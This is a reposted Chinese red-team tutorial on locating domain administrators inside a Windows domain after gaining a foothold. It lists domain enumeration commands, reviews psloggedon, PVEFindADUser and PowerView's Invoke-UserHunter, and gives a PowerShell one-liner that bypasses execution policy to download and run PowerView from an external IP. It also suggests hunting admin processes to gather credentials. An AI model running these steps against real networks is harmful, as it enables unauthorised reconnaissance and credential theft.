碼上快樂

相關內容    簡體    繁體

淺談內網信息收集之定位域管理員

本文轉載自   查看原文   2020-12-11 20:50   990    紅隊/ 滲透測試/ windows/ 內網滲透

在有域的環境中,要進行進一步滲透,一定會向域管理員權限靠攏的

關於之前域內信息收集的命令,我在之前文章有整理過

今天不提信息收集,畢竟信息收集是個大活,也寫不完

關於橫向移動和hash抓取,我之前文章也有講

 

今天就說如何在信息收集中,定位域管理員的小知識點

 

從域內一台機器上,定位域管理員有兩種渠道,要么日志,要么會話

日志可以導出查看、會話的話,康康域中機器的登錄會話是哪一個,也許有意外收獲

 

0x00 前言

先做一些准備工作,遞進關系

 

在域中任意機器上執行

net view /domain

 

 查看當前域名

 

net view /domain:域名

查看域內部所有計算機名

 

net group /domain

查看域內部所有用戶組列表

 

net group "domain computers" /domain

查看所有域成員計算機列表

 

net accounts /domain

查看域密碼信息

 

nltest /domian_trusts

獲取域信任信息

 

nltest /DCLIST:域名

查看域控制器機器名

 

net time /domain

查看當前時間,因為時間服務器也是主域服務器,可以看到域服務器的機器名

 

net group "Domain Controllers" /domain

查看域控制器組,因為可能有不止一台域控,有主備之分

 

net user /domain

查詢域內用戶,會看到熟悉的krbtgt用戶

 

wmic useraccount get /all

獲取域內用戶詳細信息

 

dsquery user

查看域內存在的用戶

 

net localgroup administrators

查看本地管理員用戶組

 

net group "domain admins" /domain

查詢域管理員用戶

 

......那么問題來了

既然可以查到域中有哪些域管理員賬號,那這篇文章講什么呢?

講的是定位,看一眼,有哪些賬號登錄了哪些機器,不然你抓密碼都不知道去哪抓

 

0x01 psloggedon.exe

下載鏈接  https://docs.microsoft.com/en-us/sysinternals/downloads/psloggedon

pstools大禮包中自帶此工具

此工具用於查看本地登錄的用戶和通過本地計算機或遠程計算機資源登錄的用戶

psloggedon.exe [-] [-l] [-x] [\\computername或username]

 

 

 \\后面接的是域控機器名,看一下登錄過域控的用戶名

如果\\接的是用戶名,那就會搜索網上鄰居的計算機,並顯示當前用戶是否已經登錄

 

據說此工具某些功能需要管理員權限,我也沒測試出具體哪些功能有限制

后面接用戶名可以查看此用戶登錄過的計算機

不過此工具本質是檢測注冊表中HKEY_USERS的key值、調用了NetSessionEnum的API來判斷誰登錄過哪台機器,如果無法讀取或者讀取注冊表失敗,此工具效果很差

 

 

0x02 PVEFindADUser.exe

下載鏈接 https://github.com/chrisdee/Tools/tree/master/AD/ADFindUsersLoggedOn

功能也是查找域用戶位置、某計算機上登錄用戶。運行需要計算機支持framework2.0且以管理員權限運行

直接pvefinaduser.exe -current,一把梭,即可查看域中所有計算機的登錄用戶

但是貌似系統判斷精准度有些問題。。。

 

 

0x03 PowerView.ps1 腳本

下載鏈接 : https://github.com/PowerShellEmpire/PowerTools

Invoke-UserHunter:找到域內特定的用戶群

 打開powershell,進入Recon目錄,輸入Import-Module .\PowerView.ps1    導入腳本

然后輸入Invoke-UserHunter

 

 即可獲得所有域管理員的登錄位置信息

 

 我這是在本機演示的,有此工具,實際上可能目標機器並沒有這個工具,那就需要遠程導入了

比如

powershell.exe -exec bypass IEX(New-Object Net.WebClient).DownloadString('http://外網IP/powersploit/Recon/PowerView.ps1');Invoke-UserHunter

類似這種的情況可能多一些

 

補充:

如果我們上一步確定了域管理員登錄了哪台機器,可以通過尋找域管理員登錄進程,來收集域管理員憑據

啊,但是,可能你獲得權限的登錄這台機器的用戶不是域管理員權限用戶,且沒有管理員權限的用戶登錄過這台機器,那就比較蛋疼

 

比如在你獲取權限的機器上執行:

net group "Domain Admins" /domain 獲取域管理員列表

tasklist /v 列出本機所有進程及進程用戶

如果有域管理員登錄這台機器就會有匹配的進程了

但大多數情況下不會有這么好運氣

 

 另:PowerView是個好東西

 

未經允許,禁止轉載


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



猜您在找 【內網滲透】— 內網信息收集(4) 內網滲透--信息收集(一) 內網信息收集(上) 【辦公】管理員已阻止你運行此應用。有關詳細信息,請與管理員聯系。windows10 內網滲透-域內信息收集 4.內網信息收集(補充) 內網滲透 | 內網中的信息收集 【內網信息收集】之域內用戶信息 Mac 怎么刪除管理員 ZooKeeper管理員指南(九)
 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM